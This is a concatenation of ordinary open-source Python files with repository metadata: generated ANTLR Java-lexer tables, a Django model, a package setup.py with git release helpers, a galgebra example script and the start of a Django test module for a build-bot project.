DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u00a3"),
DFA.unpack(u"\1\u00a4"),
DFA.unpack(u""),
DFA.unpack(u"\1\74\1\uffff\10\163\2\74\12\uffff\3\74\35\uffff\3"
u"\74"),
DFA.unpack(u""),
DFA.unpack(u"\1\74\1\uffff\12\165\12\uffff\3\74\35\uffff\3\74"),
DFA.unpack(u"\1\u00a6"),
DFA.unpack(u"\1\u00a7"),
DFA.unpack(u"\1\u00a8"),
DFA.unpack(u"\1\u00a9"),
DFA.unpack(u"\1\u00ab\2\uffff\1\u00aa"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\4\55\1\u00ac\25\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08"
u"\55\u1040\uffff\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e"
u"\55\u10d2\uffff\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00ae"),
DFA.unpack(u""),
DFA.unpack(u"\1\u00af"),
DFA.unpack(u"\1\u00b0"),
DFA.unpack(u"\1\u00b1"),
DFA.unpack(u"\1\u00b2"),
DFA.unpack(u"\1\u00b3"),
DFA.unpack(u"\1\u00b4"),
DFA.unpack(u"\1\u00b5"),
DFA.unpack(u"\1\u00b6"),
DFA.unpack(u"\1\u00b7"),
DFA.unpack(u"\1\u00b8"),
DFA.unpack(u"\1\u00b9"),
DFA.unpack(u"\1\u00ba"),
DFA.unpack(u"\1\u00bb"),
DFA.unpack(u"\1\u00bc"),
DFA.unpack(u"\1\u00bd"),
DFA.unpack(u"\1\u00be"),
DFA.unpack(u"\1\u00bf"),
DFA.unpack(u"\1\u00c0"),
DFA.unpack(u"\1\u00c1"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00c3"),
DFA.unpack(u"\1\u00c4"),
DFA.unpack(u"\1\u00c5"),
DFA.unpack(u"\1\u00c6"),
DFA.unpack(u"\1\u00c7"),
DFA.unpack(u"\1\u00c8"),
DFA.unpack(u"\1\u00c9"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00cb"),
DFA.unpack(u"\1\u00cc"),
DFA.unpack(u""),
DFA.unpack(u"\1\u00cd"),
DFA.unpack(u"\1\u00ce"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00d0"),
DFA.unpack(u"\1\u00d1"),
DFA.unpack(u"\1\u00d2"),
DFA.unpack(u"\1\u00d3"),
DFA.unpack(u"\1\u00d4"),
DFA.unpack(u""),
DFA.unpack(u"\1\u00d5"),
DFA.unpack(u"\1\u00d6"),
DFA.unpack(u"\1\u00d7"),
DFA.unpack(u"\1\u00d8"),
DFA.unpack(u"\1\u00d9"),
DFA.unpack(u"\1\u00da"),
DFA.unpack(u"\1\u00db"),
DFA.unpack(u""),
DFA.unpack(u"\1\u00dc"),
DFA.unpack(u"\1\u00dd"),
DFA.unpack(u"\1\u00de"),
DFA.unpack(u"\1\u00df"),
DFA.unpack(u"\1\u00e0"),
DFA.unpack(u"\1\u00e1"),
DFA.unpack(u"\1\u00e2"),
DFA.unpack(u"\1\u00e3"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00e5"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00e7"),
DFA.unpack(u"\1\u00e8"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00ec"),
DFA.unpack(u"\1\u00ed"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\u00f0"),
DFA.unpack(u"\1\u00f1"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00f3"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u00f5"),
DFA.unpack(u"\1\u00f6"),
DFA.unpack(u""),
DFA.unpack(u"\1\u00f7"),
DFA.unpack(u"\1\u00f8"),
DFA.unpack(u"\1\u00f9"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\u00fb"),
DFA.unpack(u"\1\u00fc"),
DFA.unpack(u"\1\u00fd"),
DFA.unpack(u"\1\u00fe"),
DFA.unpack(u"\1\u00ff"),
DFA.unpack(u"\1\u0100"),
DFA.unpack(u"\1\u0101"),
DFA.unpack(u"\1\u0102"),
DFA.unpack(u"\1\u0103"),
DFA.unpack(u"\1\u0104"),
DFA.unpack(u"\1\u0105"),
DFA.unpack(u"\1\u0106"),
DFA.unpack(u"\1\u0107"),
DFA.unpack(u"\1\u0108"),
DFA.unpack(u"\1\u0109"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u010c"),
DFA.unpack(u"\1\u010d"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\u0110"),
DFA.unpack(u"\1\u0111"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u0112"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\22\55\1\u0113\7\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08"
u"\55\u1040\uffff\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e"
u"\55\u10d2\uffff\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u0115"),
DFA.unpack(u"\1\u0116"),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\13\55\1\u011a\16\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08"
u"\55\u1040\uffff\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e"
u"\55\u10d2\uffff\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u011c"),
DFA.unpack(u"\1\u011d"),
DFA.unpack(u""),
DFA.unpack(u"\1\u011e"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0120"),
DFA.unpack(u"\1\u0121"),
DFA.unpack(u"\1\u0122"),
DFA.unpack(u"\1\u0123"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0125"),
DFA.unpack(u"\1\u0126"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0128"),
DFA.unpack(u"\1\u0129"),
DFA.unpack(u"\1\u012a"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u012c"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u012e"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u012f"),
DFA.unpack(u"\1\u0130"),
DFA.unpack(u"\1\u0131"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\u0133"),
DFA.unpack(u"\1\u0134"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u0135"),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0137"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u013a"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\u013d"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\u013f"),
DFA.unpack(u"\1\u0140"),
DFA.unpack(u"\1\u0141"),
DFA.unpack(u""),
DFA.unpack(u"\1\u0142"),
DFA.unpack(u""),
DFA.unpack(u"\1\u0143"),
DFA.unpack(u"\1\u0144"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0146"),
DFA.unpack(u""),
DFA.unpack(u"\1\u0147"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u014b"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u014c"),
DFA.unpack(u""),
DFA.unpack(u"\1\u014d"),
DFA.unpack(u"\1\u014e"),
DFA.unpack(u"\1\u014f"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0151"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0154"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0157"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u0159"),
DFA.unpack(u""),
DFA.unpack(u"\1\u015a"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u""),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"\1\u015e"),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u""),
DFA.unpack(u"\1\u015f"),
DFA.unpack(u"\1\55\13\uffff\12\55\7\uffff\32\55\4\uffff\1\55\1\uffff"
u"\32\55\105\uffff\27\55\1\uffff\37\55\1\uffff\u1f08\55\u1040\uffff"
u"\u0150\55\u0170\uffff\u0080\55\u0080\uffff\u092e\55\u10d2\uffff"
u"\u5200\55\u5900\uffff\u0200\55"),
DFA.unpack(u"")
]
# class definition for DFA #29
DFA29 = DFA
def main(argv, stdin=sys.stdin, stdout=sys.stdout, stderr=sys.stderr):
from antlr3.main import LexerMain
main = LexerMain(JavaLexer)
main.stdin = stdin
main.stdout = stdout
main.stderr = stderr
main.execute(argv)
if __name__ == '__main__':
main(sys.argv)
|
leriomaggio/code-coherence-evaluation-tool
|
code_comments_coherence/source_code_analysis/code_analysis/JavaLexer.py
|
Python
|
bsd-3-clause
| 118,769
|
# coding: utf-8
from dj_diabetes.models import HatModel
class Foods(HatModel):
"""
Foods
"""
class Meta:
verbose_name = 'Foods'
verbose_name_plural = 'Foods'
def __str__(self):
return "%s" % self.title
|
foxmask/dj-diabetes
|
dj_diabetes/models/foods.py
|
Python
|
bsd-3-clause
| 254
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
from setuptools import setup, find_packages, Command
readme = open('README.rst').read()
history = open('HISTORY.rst').read().replace('.. :changelog:', '')
def read_reqs(name):
with open(os.path.join(os.path.dirname(__file__), name)) as f:
return [line for line in f.read().split('\n') if line and not line.strip().startswith('#')]
def read_version():
with open(os.path.join('lib', 'tri_declarative', '__init__.py')) as f:
m = re.search(r'''__version__\s*=\s*['"]([^'"]*)['"]''', f.read())
if m:
return m.group(1)
raise ValueError("couldn't find version")
class Tag(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
from subprocess import call
version = read_version()
errno = call(['git', 'tag', '--annotate', version, '--message', 'Version %s' % version])
if errno == 0:
print("Added tag for version %s" % version)
raise SystemExit(errno)
class ReleaseCheck(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
from subprocess import check_output, CalledProcessError
try:
tag = check_output(['git', 'describe', 'HEAD']).strip().decode('utf8')
except CalledProcessError:
tag = ''
version = read_version()
if tag != version:
print('Missing %s tag on release' % version)
raise SystemExit(1)
current_branch = check_output(['git', 'rev-parse', '--abbrev-ref', 'HEAD']).strip().decode('utf8')
if current_branch != 'master':
print('Only release from master')
raise SystemExit(1)
print("Ok to distribute files")
# NB: _don't_ add namespace_packages to setup(), it'll break
# everything using imp.find_module
setup(
name='tri.declarative',
version=read_version(),
description='tri.declarative contains class decorators to define classes with subclass semantics in the style of django Model classes.',
long_description=readme + '\n\n' + history,
author='Johan Lübcke',
author_email='johan.lubcke@trioptima.com',
url='https://github.com/TriOptima/tri.declarative',
packages=find_packages('lib'),
package_dir={'': 'lib'},
include_package_data=True,
install_requires=read_reqs('requirements.txt'),
license="BSD",
zip_safe=False,
keywords='tri.declarative',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
],
test_suite='tests',
cmdclass={'tag': Tag,
'release_check': ReleaseCheck},
)
|
TriOptima/tri.declarative
|
setup.py
|
Python
|
bsd-3-clause
| 3,007
|
from __future__ import print_function
from sympy import symbols
from galgebra.deprecated import MV
from galgebra.printer import enhance_print,Get_Program,Print_Function
def MV_setup_options():
Print_Function()
(e1,e2,e3) = MV.setup('e_1 e_2 e_3','[1,1,1]')
v = MV('v', 'vector')
print(v)
(e1,e2,e3) = MV.setup('e*1|2|3','[1,1,1]')
v = MV('v', 'vector')
print(v)
(e1,e2,e3) = MV.setup('e*x|y|z','[1,1,1]')
v = MV('v', 'vector')
print(v)
coords = symbols('x y z')
(e1,e2,e3,grad) = MV.setup('e','[1,1,1]',coords=coords)
v = MV('v', 'vector')
print(v)
return
def dummy():
return
def main():
Get_Program(True)
enhance_print()
MV_setup_options()
return
if __name__ == "__main__":
main()
|
arsenovic/galgebra
|
examples/Old Format/mv_setup_options.py
|
Python
|
bsd-3-clause
| 775
|
from djangosanetesting.cases import UnitTestCase
from djangosanetesting.cases import DatabaseTestCase
from mock import Mock
from unit_project.tests.helpers import (
MockJob, MockBuildComputer, MockProject,
EchoJob, MultipleEchoJob,
register_mock_jobs_and_commands,
)
import os, os.path
from datetime import datetime
from django.utils.simplejson import dumps, loads
from django.core import urlresolvers
from django.core.urlresolvers import get_script_prefix
from buildbot.status.builder import SUCCESS, WARNINGS, FAILURE, SKIPPED, EXCEPTION
from cthulhubot.assignment import Assignment
from cthulhubot.err import RemoteCommandError, UnconfiguredCommandError
from cthulhubot.project import create_project
from cthulhubot.models import Job, JobAssignment, BuildComputer, Command, ProjectClient, Project, Buildmaster
from cthulhubot.views import create_job_assignment
from cthulhubot.mongo import get_database_connection
class TestJobsConfiguration(DatabaseTestCase):
def setUp(self):
super(TestJobsConfiguration, self).setUp()
self._mock_resolver()
register_mock_jobs_and_commands()
job_model = Mock()
self.job = EchoJob(model=job_model)
job_model.get_domain_object.return_value = self.job
computer = MockBuildComputer()
computer.id = 1
project = MockProject()
project.id = 1
assignment_model = Mock()
assignment_model.computer = computer
assignment_model.job = self.job.model
assignment_model.project = project,
assignment_model.config = dumps({})
self.assignment = Assignment(model=assignment_model)
def _mock_resolver(self):
self._original_resolver = urlresolvers.get_resolver
resolver = Mock()
self.prefix = get_script_prefix()
self.mocked_uri = resolver.reverse.return_value="heureka"
urlresolvers.get_resolver = lambda conf: resolver
def _unmock_resolver(self):
urlresolvers.get_resolver = self._original_resolver
def test_unconfigured_job_retrieval(self):
self.assert_raises(UnconfiguredCommandError, self.assignment.get_shell_commands)
def test_loading_empty_configuration_still_raises_error(self):
self.assert_raises(UnconfiguredCommandError, self.assignment.get_shell_commands)
def test_configuration_propageted_to_command(self):
text = 'bazaah!'
self.assignment.model.config = dumps({
'commands' : [
{
'command' : 'cthulhubot-test-helper-echo',
'parameters' : {
'what' : text
}
}
]})
self.assert_equals([['echo', text]], self.assignment.get_shell_commands())
def tearDown(self):
self._unmock_resolver()
super(TestJobsConfiguration, self).tearDown()
class TestCreation(DatabaseTestCase):
def setUp(self):
super(TestCreation, self).setUp()
self._mock_resolver()
self.project_name = u"project"
self.project = create_project(name=self.project_name, tracker_uri="http://example.com", repository_uri="/tmp/project")
